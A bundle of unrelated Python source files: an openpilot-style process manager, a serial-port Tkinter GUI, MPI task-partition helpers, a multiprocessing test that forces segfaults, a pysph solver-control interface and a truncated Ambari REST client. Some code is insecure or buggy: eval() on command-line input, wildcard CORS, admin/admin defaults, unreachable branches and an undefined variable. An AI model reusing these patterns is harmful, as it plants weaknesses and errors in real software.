# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params: List[Tuple[str, Union[str, bytes]]] = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("IsMetric", "1"),
("AutoLaneChangeEnabled", "0"),
("LaneChangeSpeedMin", "30"),
("ShowDebugUI", "0"),
("AutoResumeFromGas", "1"),
("AutoResumeFromGasSpeed", "30"),
("dp_lqr", "1"),
("OpkrPrebuiltOn", "0"),
("dpAccelProfileCtrl", "1"),
("dpAccelProfile", "1"),
("dpLaneLessMode", "2"),
("AutoCurveSpeedCtrl", "1"),
("OnBootNavi", "0"),
("AutoResumeFromBrakeRelease", "1"),
("AutoResumeFromBrakeReleaseDist", "10"),
("AutoResumeFromBrakeReleaseLeadCar", "1"),
("NaviDecelMarginDist", "140"),
("NaviDecelRate", "50"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightnessOff", "0"),
("OpkrUIBrightness", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE", "0"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not is_dirty():
os.environ['CLEAN'] = '1'
# init logging
sentry.init(sentry.SentryProject.SELFDRIVE)
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty(),
device=HARDWARE.get_device_type())
def manager_prepare() -> None:
for p in managed_processes.values():
p.prepare()
def manager_cleanup() -> None:
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread() -> None:
if EON:
Process(name="autoshutdownd", target=launcher, args=("selfdrive.autoshutdownd", "autoshutdownd")).start()
system("am startservice com.neokii.optool/.MainService")
cloudlog.bind(daemon="manager")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
ignore: List[str] = []
if params.get("DongleId", encoding='utf8') in (None, UNREGISTERED_DONGLE_ID):
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
ignore += [x for x in os.getenv("BLOCK", "").split(",") if len(x) > 0]
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
print_timer = 0
while True:
sm.update()
not_run = ignore[:]
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print_timer = (print_timer + 1)%10
if print_timer == 0:
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
shutdown = True
params.put("LastManagerExitReason", param)
cloudlog.warning(f"Shutting down manager - {param} set")
if shutdown:
break
def map_exec():
os.system("am start com.mnsoft.mappyobn/com.mnsoft.mappy.MainActivity &") # map
def map_hide():
os.system("am start --activity-task-on-home com.opkr.maphack/com.opkr.maphack.MainActivity") # map backgrand
def map_return():
os.system("am start --activity-task-on-home com.mnsoft.mappyobn/com.mnsoft.mappy.MainActivity")
def main() -> None:
param_navi = Params().get("OnBootNavi")
if param_navi is not None:
navi_on_boot = int(param_navi)
else:
navi_on_boot = 0
if navi_on_boot:
map_exec()
preBuiltOn = Params().get_bool("OpkrPrebuiltOn")
preBuiltFile = '/data/openpilot/prebuilt'
if not os.path.isdir("/data/openpilot"):
pass
elif not os.path.isfile(preBuiltFile) and preBuiltOn:
os.system("cd /data/openpilot; touch prebuilt")
elif os.path.isfile(preBuiltFile) and not preBuiltOn:
os.system("cd /data/openpilot; rm -f prebuilt")
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
if navi_on_boot:
map_hide()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
sentry.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
try:
managed_processes['ui'].stop()
except Exception:
pass
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
IOMaster_GUI_WithBoard.py
|
import tkinter as TK
import usb.core
import usb.util
import serial
import time
import threading
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
window = TK.Tk()
window.title("IO Master Setup")
window.geometry("500x300")
ser = serial.Serial(port='COM5', baudrate=115200)
def read_from_port(ser):
while True:
reading = ser.read()
print(reading)
if reading == b'3':
messagebox.showinfo("Works", "Pushed Button")
def sendCommand(command):
ser.write(command.encode('ascii', 'ignore'))
class Label:
def __init__(self, win, text, clmn, row):
self.lbl=ttk.Label(win, text=text)
self.lbl.grid(column=clmn, row=row)
class combobox:
def __init__(self, win, values, clmn, row):
self.cb=ttk.Combobox(win, values=values, state = "readonly")
self.cb.grid(column=clmn, row=row)
self.cb.current(1)
class Button:
def __init__(self, win, text, clmn, row):
self.btn=ttk.Button(win, text=text, command=self.press)
self.btn.grid(column=clmn, row=row)
def press(self):
btn_text = self.btn.cget('text')
#Push Actions for "Configure" Button
if btn_text == "Configure":
OutputVariables = "Protocol: " + cb0.cb.get() + '\n' + "Voltage: " + cb1.cb.get() + '\n' + "Frequency: " + cb2.cb.get() + "\n"
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
OutConfigTxt.insert(TK.END, OutputVariables)
OutConfigTxt.configure(state="disable")
protocol = cb0.cb.get()
voltage = cb1.cb.get()
frequency = cb2.cb.get()
if voltage == "3.3V":
sendCommand('v0')
if voltage == "5V":
sendCommand('v1')
if voltage == "12V":
sendCommand('v2')
if voltage == "24V":
sendCommand('v3')
#Wait for OKAY (z) before moving on
window.after(1000)
if frequency == "1kHZ":
sendCommand('f0')
if frequency == "10kHZ":
sendCommand('f1')
if frequency == "100kHZ":
sendCommand('f2')
if frequency == "1MHZ":
sendCommand('f3')
#wait for OKAY before finishing loop. (exit as necessary)
#Push Actions for "Send Data" Button
if btn_text == "Send Data":
dataToSend = DataText.get('1.0', END)
dataToSend = dataToSend.rstrip()
for letter in dataToSend:
if letter is not '0' and letter is not '1':
messagebox.showinfo("Error", "Invalid Data.\n Os and 1s Only")
return
if dataToSend == '\n':
messagebox.showinfo("Error", "Please Enter Data to Send.\n Os and 1s Only")
return
if len(dataToSend) is not 8:
messagebox.showinfo("Error", "Invalid Data.\n Should be 8 bits long.\n Os and 1s Only")
return
dataToSend = 's' + dataToSend + '\0'
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
OutConfigTxt.insert(TK.END, "Data Sent: " + dataToSend.rstrip() + '\n' + str(len(dataToSend.rstrip())))
OutConfigTxt.configure(state="disable")
sendCommand(dataToSend) #send command to the board
#declare Visual Components
lbl0 = Label(window, "Protocol", 0, 0)
lbl1 = Label(window, "Voltage:", 0, 1)
lbl2 = Label(window, "Frequency:", 0, 2)
lbl3 = Label(window, "Data to Send:", 0, 3)
cb0 = combobox(window, ["I2C", "UART", "SPI", "SWD", "RS-485"], 1, 0)
cb0.cb.current(2) #Set to SPI
cb0.cb.configure(state = "disabled") #Only want SPI For now
cb1 = combobox(window, ["3.3V","5V", "12V", "24V" ], 1, 1)
cb2 = combobox(window, ["1kHz", "10kHz", "100kHz", "1MHz"], 1, 2)
btn1 = Button(window, "Configure", 2, 1) #Send configure Data
btn2 = Button(window, "Send Data", 2, 3) #Send Input Data
DataText = TK.Text(window, height=1, width=17) #Box to input Binary Data to send
DataText.grid(column=1, row=3)
OutConfigTxt = TK.Text(window, height = 5, width = 36, state = "disabled") #Display sent configurables in this box
OutConfigTxt.grid(column=0, row=6, columnspan=3)
def main():
serialThread = threading.Thread(target=read_from_port, args=(ser,))
serialThread.start()
window.mainloop()
if (__name__ == '__main__'):
main()
|
mpi.py
|
#!/usr/bin/env python
import sys
import time
import threading
import traceback
import numpy
from mpi4py import MPI
from . import mpi_pool
from .mpi_pool import MPIPool
_registry = {}
if 'pool' not in _registry:
import atexit
pool = MPIPool(debug=False)
_registry['pool'] = pool
atexit.register(pool.close)
comm = pool.comm
rank = pool.rank
def static_partition(tasks):
size = len(tasks)
segsize = (size+pool.size-1) // pool.size
start = pool.rank * segsize
stop = min(size, start+segsize)
return tasks[start:stop]
def work_balanced_partition(tasks, costs=None):
if costs is None:
costs = numpy.ones(tasks)
if rank == 0:
segsize = float(sum(costs)) / pool.size
loads = []
cum_costs = numpy.cumsum(costs)
start_id = 0
for k in range(pool.size):
stop_id = numpy.argmin(abs(cum_costs - (k+1)*segsize)) + 1
stop_id = max(stop_id, start_id+1)
loads.append([start_id,stop_id])
start_id = stop_id
comm.bcast(loads)
else:
loads = comm.bcast()
if rank < len(loads):
start, stop = loads[rank]
return tasks[start:stop]
else:
return tasks[:0]
INQUIRY = 50050
TASK = 50051
def work_share_partition(tasks, interval=.02, loadmin=1):
loadmin = max(loadmin, len(tasks)//50//pool.size)
rest_tasks = [x for x in tasks[loadmin*pool.size:]]
tasks = tasks[loadmin*rank:loadmin*rank+loadmin]
def distribute_task():
while True:
load = len(tasks)
if rank == 0:
for i in range(pool.size):
if i != 0:
load = comm.recv(source=i, tag=INQUIRY)
if rest_tasks:
if load <= loadmin:
task = rest_tasks.pop(0)
comm.send(task, i, tag=TASK)
else:
comm.send('OUT_OF_TASK', i, tag=TASK)
else:
comm.send(load, 0, tag=INQUIRY)
if comm.Iprobe(source=0, tag=TASK):
tasks.append(comm.recv(source=0, tag=TASK))
if tasks[-1] == 'OUT_OF_TASK':
return
time.sleep(interval)
tasks_handler = threading.Thread(target=distribute_task)
tasks_handler.start()
while True:
if tasks:
task = tasks.pop(0)
if task == 'OUT_OF_TASK':
tasks_handler.join()
return
yield task
def work_stealing_partition(tasks, interval=.0001):
tasks = static_partition(tasks)
out_of_task = [False]
def task_daemon():
while True:
time.sleep(interval)
while comm.Iprobe(source=MPI.ANY_SOURCE, tag=INQUIRY):
src, req = comm.recv(source=MPI.ANY_SOURCE, tag=INQUIRY)
if req == 'STOP_DAEMON':
return
elif tasks:
comm.send(tasks.pop(), src, tag=TASK)
elif src == 0 and req == 'ALL_DONE':
comm.send(out_of_task[0], src, tag=TASK)
elif out_of_task[0]:
comm.send('OUT_OF_TASK', src, tag=TASK)
else:
comm.send('BYPASS', src, tag=TASK)
def prepare_to_stop():
out_of_task[0] = True
if rank == 0:
while True:
done = []
for i in range(1, pool.size):
comm.send((0,'ALL_DONE'), i, tag=INQUIRY)
done.append(comm.recv(source=i, tag=TASK))
if all(done):
break
time.sleep(interval)
for i in range(pool.size):
comm.send((0,'STOP_DAEMON'), i, tag=INQUIRY)
tasks_handler.join()
if pool.size > 1:
tasks_handler = threading.Thread(target=task_daemon)
tasks_handler.start()
while tasks:
task = tasks.pop(0)
yield task
if pool.size > 1:
def next_proc(proc):
proc = (proc+1) % pool.size
if proc == rank:
proc = (proc+1) % pool.size
return proc
proc_last = (rank + 1) % pool.size
proc = next_proc(proc_last)
while True:
comm.send((rank,None), proc, tag=INQUIRY)
task = comm.recv(source=proc, tag=TASK)
if task == 'OUT_OF_TASK':
prepare_to_stop()
return
elif task == 'BYPASS':
if proc == proc_last:
prepare_to_stop()
return
else:
proc = next_proc(proc)
else:
if proc != proc_last:
proc_last, proc = proc, next_proc(proc)
yield task
def bcast(buf, root=0):
buf = numpy.asarray(buf, order='C')
shape, dtype = comm.bcast((buf.shape, buf.dtype))
if rank != root:
buf = numpy.empty(shape, dtype=dtype)
comm.Bcast(buf, root)
return buf
## Useful when sending large batches of arrays
#def safe_bcast(buf, root=0):
def reduce(sendbuf, op=MPI.SUM, root=0):
sendbuf = numpy.asarray(sendbuf, order='C')
shape, mpi_dtype = comm.bcast((sendbuf.shape, sendbuf.dtype.char))
_assert(sendbuf.shape == shape and sendbuf.dtype.char == mpi_dtype)
recvbuf = numpy.zeros_like(sendbuf)
comm.Reduce(sendbuf, recvbuf, op, root)
if rank == root:
return recvbuf
else:
return sendbuf
def allreduce(sendbuf, op=MPI.SUM):
sendbuf = numpy.asarray(sendbuf, order='C')
shape, mpi_dtype = comm.bcast((sendbuf.shape, sendbuf.dtype.char))
_assert(sendbuf.shape == shape and sendbuf.dtype.char == mpi_dtype)
recvbuf = numpy.zeros_like(sendbuf)
comm.Allreduce(sendbuf, recvbuf, op)
return recvbuf
def gather(sendbuf, root=0):
# if pool.debug:
# if rank == 0:
# res = [sendbuf]
# for k in range(1, pool.size):
# dat = comm.recv(source=k)
# res.append(dat)
# return numpy.vstack([x for x in res if len(x) > 0])
# else:
# comm.send(sendbuf, dest=0)
# return sendbuf
sendbuf = numpy.asarray(sendbuf, order='C')
mpi_dtype = sendbuf.dtype.char
if rank == root:
size_dtype = comm.gather((sendbuf.size, mpi_dtype), root=root)
_assert(all(x[1] == mpi_dtype for x in size_dtype if x[0] > 0))
counts = numpy.array([x[0] for x in size_dtype])
displs = numpy.append(0, numpy.cumsum(counts[:-1]))
recvbuf = numpy.empty(sum(counts), dtype=sendbuf.dtype)
comm.Gatherv([sendbuf.ravel(), mpi_dtype],
[recvbuf.ravel(), counts, displs, mpi_dtype], root)
return recvbuf.reshape((-1,) + sendbuf[0].shape)
else:
comm.gather((sendbuf.size, mpi_dtype), root=root)
comm.Gatherv([sendbuf.ravel(), mpi_dtype], None, root)
return sendbuf
def allgather(sendbuf):
sendbuf = numpy.asarray(sendbuf, order='C')
shape, mpi_dtype = comm.bcast((sendbuf.shape, sendbuf.dtype.char))
_assert(sendbuf.dtype.char == mpi_dtype or sendbuf.size == 0)
counts = numpy.array(comm.allgather(sendbuf.size))
displs = numpy.append(0, numpy.cumsum(counts[:-1]))
recvbuf = numpy.empty(sum(counts), dtype=sendbuf.dtype)
comm.Allgatherv([sendbuf.ravel(), mpi_dtype],
[recvbuf.ravel(), counts, displs, mpi_dtype])
return recvbuf.reshape((-1,) + shape[1:])
def alltoall(sendbuf, split_recvbuf=False):
if isinstance(sendbuf, numpy.ndarray):
mpi_dtype = comm.bcast(sendbuf.dtype.char)
sendbuf = numpy.asarray(sendbuf, mpi_dtype, 'C')
nrow = sendbuf.shape[0]
ncol = sendbuf.size // nrow
segsize = (nrow+pool.size-1) // pool.size * ncol
sdispls = numpy.arange(0, pool.size*segsize, segsize)
sdispls[sdispls>sendbuf.size] = sendbuf.size
scounts = numpy.append(sdispls[1:]-sdispls[:-1], sendbuf.size-sdispls[-1])
else:
assert(len(sendbuf) == pool.size)
mpi_dtype = comm.bcast(sendbuf[0].dtype.char)
sendbuf = [numpy.asarray(x, mpi_dtype).ravel() for x in sendbuf]
scounts = numpy.asarray([x.size for x in sendbuf])
sdispls = numpy.append(0, numpy.cumsum(scounts[:-1]))
sendbuf = numpy.hstack(sendbuf)
rcounts = numpy.asarray(comm.alltoall(scounts))
rdispls = numpy.append(0, numpy.cumsum(rcounts[:-1]))
recvbuf = numpy.empty(sum(rcounts), dtype=mpi_dtype)
comm.Alltoallv([sendbuf.ravel(), scounts, sdispls, mpi_dtype],
[recvbuf.ravel(), rcounts, rdispls, mpi_dtype])
if split_recvbuf:
return [recvbuf[p0:p0+c] for p0,c in zip(rdispls,rcounts)]
else:
return recvbuf
def sendrecv(sendbuf, source=0, dest=0):
if source == dest:
return sendbuf
if rank == source:
sendbuf = numpy.asarray(sendbuf, order='C')
comm.send((sendbuf.shape, sendbuf.dtype), dest=dest)
comm.Send(sendbuf, dest=dest)
return sendbuf
elif rank == dest:
shape, dtype = comm.recv(source=source)
recvbuf = numpy.empty(shape, dtype=dtype)
comm.Recv(recvbuf, source=source)
return recvbuf
def _assert(condition):
if not condition:
sys.stderr.write(''.join(traceback.format_stack()[:-1]))
comm.Abort()
def register_for(obj):
global _registry
key = id(obj)
# Keep track of the object in a global registry. On slave nodes, the
# object can be accessed from global registry.
_registry[key] = obj
keys = comm.gather(key)
if rank == 0:
obj._reg_keys = keys
return obj
def del_registry(reg_keys):
if reg_keys:
def f(reg_keys):
from mpi4pyscf.tools import mpi
mpi._registry.pop(reg_keys[mpi.rank])
pool.apply(f, reg_keys, reg_keys)
return []
|
test_pool_tee.py
|
import unittest
from contextlib import redirect_stdout
from ctypes import cdll
import random
import os
import sys
import multiprocessing
from multiprocessing import Pipe, Value
import logging
from typing import Tuple, Any
from batchkit.utils import tee_to_pipe_decorator, NonDaemonicPool, FailedRecognitionError
"""
In this test module, there are primarily three things under test:
1 -- tee_to_pipe_decorator
2 -- NonDaemonicPool
3 -- Our intended usage pattern of using them together when the pool worker proc
uses a subproc and gets back return value and exception.
"""
logger = logging.getLogger("test_pool_tee")
# logger.level = logging.DEBUG
logger.level = logging.INFO
log_stream_handler = logging.StreamHandler(sys.stdout)
# Toggle this to get useful debug trace.
# logger.addHandler(log_stream_handler)
test_root = os.path.dirname(os.path.realpath(__file__))
libblah_path = os.path.join(test_root, 'resources/libsegv.so')
lock = multiprocessing.Lock()
count_terms = Value('i', 0, lock=True)
count_exceptions = Value('i', 0, lock=True)
count_returns = Value('i', 0, lock=True)
# Emulates the work item on pool, run by the pool worker proc.
# Delegates the dangerous stuff to a subproc. We test the full
# pattern using tee_to_pipe_decorator() even though we may not
# have all of sig term, exception, and return in one app.
def parent_entry(id: int):
global count_terms, count_exceptions, count_returns
parent_conn, child_conn = Pipe()
work_proc = multiprocessing.Process(
target=tee_to_pipe_decorator(work_entry, child_conn),
args=(id,))
work_proc.start()
_, status = os.waitpid(work_proc.pid, 0)
if os.WIFSIGNALED(status):
signum = os.WTERMSIG(status)
assert signum == 11
assert not parent_conn.poll()
logger.debug("TERM")
with count_terms.get_lock():
count_terms.value += 1
else:
assert os.WIFEXITED(status)
# We either have a return value or an exception
assert parent_conn.poll()
obj = parent_conn.recv()
if isinstance(obj, Exception):
logger.debug("EXCEPTION")
with count_exceptions.get_lock():
count_exceptions.value += 1
# Making sure it's actually raisable else this pool proc dies
# and we deadlock outside.
try:
raise obj
except Exception as e:
logger.debug("CAUGHT MYSELF: {0}".format(e))
else:
# This would fail if obj were not the successful return type.
assert obj[0] == 123
assert obj[1] == 456
logger.debug("RETURN")
with count_returns.get_lock():
count_returns.value += 1
parent_conn.close()
child_conn.close()
logger.debug("Parent {0} is returning".format(id))
return None
def work_entry(somearg: int) -> Tuple[int, int]:
if random.choice(["succeed", "segv"]) == "succeed":
if random.choice(["succeed", "throw"]) == "succeed":
return 123, 456
else:
raise FailedRecognitionError("a failed recognition")
else:
lib = cdll.LoadLibrary(libblah_path)
lib.foo()
return 123, 456
count_pool_success = 0
count_pool_errors = 0
def on_finish(anything: Any):
global count_pool_success
lock.acquire()
count_pool_success += 1
lock.release()
def on_error(anything: Any):
global count_pool_errors
lock.acquire()
count_pool_errors += 1
lock.release()
class TestPoolWithTee(unittest.TestCase):
global count_pool_success, count_pool_errors
global count_terms, count_exceptions, count_returns
def test_NonDaemonicPool_with_tee_to_pipe(self):
# Disable because we know it works and interfering due to parallel tests (need to prevent that).
# return
pool_procs = 4
num_tasks = 100
p = NonDaemonicPool(pool_procs)
for i in range(num_tasks):
p.apply_async(parent_entry, [i], callback=on_finish, error_callback=on_error)
p.close()
p.join()
logger.debug("Final count_pool_success: {0}".format(count_pool_success))
logger.debug("Final count_pool_errors: {0}".format(count_pool_errors))
assert count_pool_success == num_tasks
assert count_pool_errors == 0
# Ensure we saw at least one of each.
logger.debug("Final count_exceptions: {0}".format(count_exceptions.value))
logger.debug("Final count_returns: {0}".format(count_returns.value))
logger.debug("Final count_terms: {0}".format(count_terms.value))
assert count_exceptions.value > 0
assert count_returns.value > 0
assert count_terms.value > 0
assert count_exceptions.value + count_returns.value + count_terms.value == num_tasks
if __name__ == '__main__':
multiprocessing.set_start_method('fork')
unittest.main()
|
solver_interfaces.py
|
import threading
import os
import socket
try:
from SimpleXMLRPCServer import (SimpleXMLRPCServer,
SimpleXMLRPCRequestHandler)
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
# Python 3.x
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from http.server import SimpleHTTPRequestHandler
from multiprocessing.managers import BaseManager, BaseProxy
def get_authkey_bytes(authkey):
if isinstance(authkey, bytes):
return authkey
else:
return authkey.encode('utf-8')
class MultiprocessingInterface(BaseManager):
""" A multiprocessing interface to the solver controller
This object exports a controller instance proxy over the multiprocessing
interface. Control actions can be performed by connecting to the interface
and calling methods on the controller proxy instance """
def __init__(self, address=None, authkey=None, try_next_port=False):
authkey = get_authkey_bytes(authkey)
BaseManager.__init__(self, address, authkey)
self.authkey = authkey
self.try_next_port = try_next_port
def get_controller(self):
return self.controller
def start(self, controller):
self.controller = controller
self.register('get_controller', self.get_controller)
if not self.try_next_port:
self.get_server().serve_forever()
host, port = self.address
while self.try_next_port:
try:
BaseManager.__init__(self, (host, port), self.authkey)
self.get_server().serve_forever()
self.try_next_port = False
except socket.error as e:
try_next_port = False
import errno
if e.errno == errno.EADDRINUSE:
port += 1
else:
raise
class MultiprocessingClient(BaseManager):
""" A client for the multiprocessing interface
Override the run() method to do appropriate actions on the proxy
instance of the controller object or add an interface using the
add_interface methods similar to the Controller.add_interface method """
def __init__(self, address=None, authkey=None, serializer='pickle',
start=True):
authkey = get_authkey_bytes(authkey)
BaseManager.__init__(self, address, authkey, serializer)
if start:
self.start()
def start(self, connect=True):
self.interfaces = []
# to work around a python caching bug
# http://stackoverflow.com/questions/3649458/broken-pipe-when-using-python-multiprocessing-managers-basemanager-syncmanager
if self.address in BaseProxy._address_to_local:
del BaseProxy._address_to_local[self.address][0].connection
self.register('get_controller')
if connect:
self.connect()
self.controller = self.get_controller()
self.run(self.controller)
@staticmethod
def is_available(address):
try:
socket.create_connection(address, 1).close()
return True
except socket.error:
return False
def run(self, controller):
pass
def add_interface(self, callable):
""" This makes it act as substitute for the actual command_manager """
thr = threading.Thread(target=callable, args=(self.controller,))
thr.daemon = True
thr.start()
return thr
class CrossDomainXMLRPCRequestHandler(SimpleXMLRPCRequestHandler,
SimpleHTTPRequestHandler):
""" SimpleXMLRPCRequestHandler subclass which attempts to do CORS
CORS is Cross-Origin-Resource-Sharing (http://www.w3.org/TR/cors/)
which enables xml-rpc calls from a different domain than the xml-rpc server
(such requests are otherwise denied)
"""
def do_OPTIONS(self):
""" Implement the CORS pre-flighted access for resources """
self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-METHODS", "POST,GET,OPTIONS")
# self.send_header("Access-Control-Max-Age", "60")
self.send_header("Content-length", "0")
self.end_headers()
def do_GET(self):
""" Handle http requests to serve html/image files only """
print(self.path, self.translate_path(self.path))
permitted_extensions = ['.html', '.png', '.svg', '.jpg', '.js']
if not os.path.splitext(self.path)[1] in permitted_extensions:
self.send_error(404, 'File Not Found/Allowed')
else:
SimpleHTTPRequestHandler.do_GET(self)
def end_headers(self):
""" End response header with adding Access-Control-Allow-Origin
This is done to enable CORS request from all clients """
self.send_header("Access-Control-Allow-Origin", "*")
SimpleXMLRPCRequestHandler.end_headers(self)
class XMLRPCInterface(SimpleXMLRPCServer):
""" An XML-RPC interface to the solver controller
Currently cannot work with objects which cannot be marshalled
(which is basically most custom classes, most importantly
ParticleArray and numpy arrays) """
def __init__(self, addr, requestHandler=CrossDomainXMLRPCRequestHandler,
logRequests=True, allow_none=True,
encoding=None, bind_and_activate=True):
SimpleXMLRPCServer.__init__(self, addr, requestHandler, logRequests,
allow_none, encoding, bind_and_activate)
def start(self, controller):
self.register_instance(controller, allow_dotted_names=False)
self.register_introspection_functions()
self.serve_forever()
class CommandlineInterface(object):
""" command-line interface to the solver controller """
def start(self, controller):
while True:
try:
try:
inp = raw_input('pysph[%d]>>> ' % controller.get('count'))
except NameError:
inp = input('pysph[%d]>>> ' % controller.get('count'))
cmd = inp.strip().split()
try:
cmd, args = cmd[0], cmd[1:]
except Exception as e:
print('Invalid command')
self.help()
continue
args2 = []
for arg in args:
try:
arg = eval(arg)
except:
pass
finally:
args2.append(arg)
if cmd == 'p' or cmd == 'pause':
controller.pause_on_next()
elif cmd == 'c' or cmd == 'cont':
controller.cont()
elif cmd == 'g' or cmd == 'get':
print(controller.get(args[0]))
elif cmd == 's' or cmd == 'set':
print(controller.set(args[0], args2[1]))
elif cmd == 'q' or cmd == 'quit':
break
else:
print(getattr(controller, cmd)(*args2))
except Exception as e:
self.help()
print(e)
def help(self):
print('''Valid commands are:
p | pause
c | cont
g | get <name>
s | set <name> <value>
q | quit -- quit commandline interface (solver keeps running)''')
|
client.py
|
import requests
from threading import Thread
import time
import sys
class Client(object):
def __init__(self,
url='http://localhost:8080',
username='admin',
passwd='admin',
operation_interval=10,
retry_refused=False,
retry_interval=3,
retry_timeout=90
):
self.url=url+'/api/v1'
self.username=username
self.passwd=passwd
self.retry_interval=retry_interval
self.operation_interval=operation_interval
self.retry_timeout=retry_timeout
self.retry_refused=retry_refused
self._stacks=None
#curl -u admin:passwd -H 'X-Requested-By: ambari' -X PUT -d '{"RequestInfo": {"context" :"Stop service "}, "Body": {"ServiceInfo": {"state": "INSTALLED"}}}' http://<AMBARI_SERVER_HOSTNAME>:8080/api/v1/clusters/<CLUSTER_NAME>/services/<Service_name>
def request(self,url='',data=None,call_method=None,status_code=None,wait=False):
kwargs={
'url':self.url+url,
'headers': {'X-Requested-By': 'ambari'},
'auth': (self.username,self.passwd)
}
if data:
kwargs['data']=data
if not call_method:
call_method=requests.put
elif not call_method:
call_method=requests.get
mustend = time.time() + self.retry_timeout
while time.time() < mustend:
try:
ret = call_method(**kwargs)
except requests.ConnectionError as ce:
if self.retry_refused:
time.sleep(self.retry_interval)
else:
raise ce
else:
print(call_method.__name__,self.url+url,ret)
condition=status_code if status_code else requests.codes.ok
if ret.status_code == condition:
if ret.text:
ret = ret.json()
if wait: time.sleep(self.operation_interval)
else:
ret=False
return ret
raise ce
def check(self,url='',data=None,call_method=None,status_code=None,wait=False):
mustend = time.time() + self.retry_timeout
while time.time() < mustend:
ret=self.request(url,data=data,call_method=call_method,status_code=status_code,wait=wait)
if ret: return ret
time.sleep(self.retry_interval)
raise Exception('check error!')
@property
def stack_info(self):
return self.request('/stacks')['items']
@property
def stacks(self):
if self._stacks is None:
self._stacks=[]
for s in self.stack_info:
name=s['Stacks']['stack_name']
vs=self.request('/stacks/'+name)['versions']
for v in vs:
version=v['Versions']['stack_version']
self._stacks.append(Stack(client=self,name=name,version=version))
return self._stacks
@property
def cluster_info(self):
return self.request('/clusters')['items']
def get_cluster_stack(self,cluster_name):
stack_info=self.request('/clusters/'+cluster_name)['stack_versions'][0]['ClusterStackVersions']
for s in self.stacks:
if s.name==stack_info['stack'] and s.version==stack_info['version']:
return s
return None
@property
def clusters(self):
cs=[]
for c in self.cluster_info:
name=c['Clusters']['cluster_name']
cs.append(Cluster(client=self,name=name,stack=self.get_cluster_stack(name)))
return cs
@property
def cluster(self):
return self.clusters[-1]
def create_cluster(self,cluster_name,stack):
c=Cluster(name=cluster_name,client=self,stack=stack)
c.create()
return c
class Stack(object):
def __init__(self,client,name,version):
self._info=None
self.client=client
self.name=name
self.version=version
self.url="/stacks/{}/versions/{}".format(self.name,self.version)
@property
def info(self):
if not self._info:
self._info=self.client.request(self.url)
return self._info
@property
def services(self):
srvs=[]
for s in self.info['services']:
srvs.append(StackService(stack=self,name=s['StackServices']['service_name']))
return srvs
class StackService(object):
def __init__(self,stack,name):
self.stack=stack
self.name=name
self.url=self.stack.url+"/services/"+self.name
self._info=None
@property
def info(self):
if not self._info:
self._info=self.stack.client.request(self.url)
return self._info
@property
def components(self):
cpns=[]
for cpn in self.info['components']:
